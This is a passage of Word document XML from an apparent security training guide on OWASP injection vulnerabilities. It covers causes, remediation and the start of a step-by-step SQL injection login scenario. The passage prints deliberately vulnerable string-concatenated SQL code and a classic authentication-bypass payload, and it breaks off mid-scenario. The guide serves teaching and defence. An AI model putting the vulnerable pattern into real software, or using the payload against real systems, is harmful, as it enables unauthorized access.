      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3506F8B0"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Style w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Key Takeaway:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Injection category is defined by a distinct duality. It includes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>highfrequency</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>, lower-impact vulnerabilities such as Cross-Site Scripting (CWE-79, over 30k CVEs) alongside lower-frequency, devastatingly high-impact vulnerabilities like SQL Injection (over 14k CVEs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F5705" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Vulnerability Mechanics &amp; Technical Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3A47EA"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An application becomes highly susceptible to injection under the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5A178" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Lack of Sanitization:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> User data is accepted and processed without undergoing strict server-side validation, filtering, or context-aware escaping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75703AAD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dynamic Concatenation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instead of using safe, parameterized APIs, string concatenation is used to construct dynamic queries or system commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8806FD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Framework Misconfiguration:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> variables are improperly passed directly into Object-Relational Mapping (ORM) search parameters (e.g., Hibernate Query Language), bypassing built-in framework protections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168119C4"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 xml:space="preserve">Common variations analyzed include </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL Injection (SQLi), NoSQL Injection, OS Command Injection, LDAP Injection,</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Expression Language (EL) Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Furthermore, as technology evolves, this class of vulnerability has adapted to next-generation systems, giving rise to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Prompt Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Large Language Models (LLMs), which is tracked independently under the OWASP LLM Top 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C61F6F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Remediation and Prevention Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0DE1C"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 xml:space="preserve">The foundational rule of preventing injection is the absolute </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>separation of data from commands</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1445AA85" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Primary Defense (Parameterized Interfaces):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The utilization of safe APIs, parameterized queries (Prepared Statements), or the correct implementation of ORMs to ensure the interpreter never treats user data as executable logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB7BB2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Secondary Defense (Input Validation &amp; Escaping):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implementing robust, positive (allow-list) server-side input validation. For scenarios where dynamic structures (like database table or column names) cannot be parameterized, context-specific escaping syntax must be rigorously enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B52B2B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pipeline Integration:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrating Static Application Security Testing (SAST), Dynamic Testing (DAST), and Interactive Testing (IAST) tools directly into the CI/CD pipeline to flag dynamic string formatting issues before code reaches production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4145B962" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Core Concept &amp; Mechanics (What &amp; How)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5B740" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>1. Technical Definition (The "What")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B3DE9A"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 xml:space="preserve">According to OWASP, an injection vulnerability is an application flaw that occurs when </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>untrusted user input is sent to an interpreter as part of a command or query</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146F974F"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The core vulnerability lies in the boundary failure between data and code. The interpreter is tricked into executing unintended commands or accessing unauthorized data because it cannot distinguish between the developer’s pre-written control structures and the attacker's supplied input strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180C719E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. The Architectural Flaw (The "Why")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F6B8D"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 xml:space="preserve">Injection is rarely a failure of a single line of code; it is an architectural flaw rooted in </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>blind trust</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>insecure string construction</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . The vulnerability exists because of three primary mistakes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7DE00E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Failure to Separate Control Plane from Data Plane:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A secure application treats user input strictly as literal data. Injection happens when developers use string concatenation to build commands dynamically. This merges the execution logic (the control plane) with the user input (the data plane).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21095F24" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Over-Reliance on Client-Side Boundaries:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Applications often assume input is safe because it passed front-end validation (e.g., a dropdown menu or form restriction). Attackers easily bypass the UI using tools like Burp Suite or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send raw, malicious strings directly to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F93AAB0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Misconfiguration of Frameworks:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modern frameworks and Object-Relational Mappers (ORMs) offer built-in parameterization. However, if a developer bypasses these features to write a custom native query or concatenates inputs directly into HQL/JPQL strings, the framework's protections are completely neutralized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F080E22" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>3. The Mechanics of an Exploit: Step-by-Step Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53131347"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 xml:space="preserve">To understand how an injection occurs, let's examine a backend authentication system using </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL Injection (SQLi)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD77E56" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The Vulnerable Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F166029"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Consider a backend system verifying user credentials via raw SQL string concatenation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48740A91" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">String query = </w:t>
      </w:r>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT * FROM users WHERE username = '" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>userInput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> + "'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C63851" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">AND password = '" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>passInput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> + "'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B3486"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Step 1: The Attacker Identifies the Injection Point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CABBE4"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The attacker visits a login page and realizes the application might be dynamically constructing SQL queries. To test this hypothesis, they input a payload designed to alter the query logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6096F10B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sample Payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AA1D52"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Step 2: The Malicious Payload is Submitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E33A2F7"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 xml:space="preserve">The attacker inputs the payload into the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> field and submits the form. The application blindly accepts this data without performing server-side input validation or sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF9ED9"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Step 3: The System Processes and Compiles the String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227D9864"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The application backend takes the raw payload and directly glues it into the pre-defined SQL template.</w:t>
      </w:r>
    </w:p>
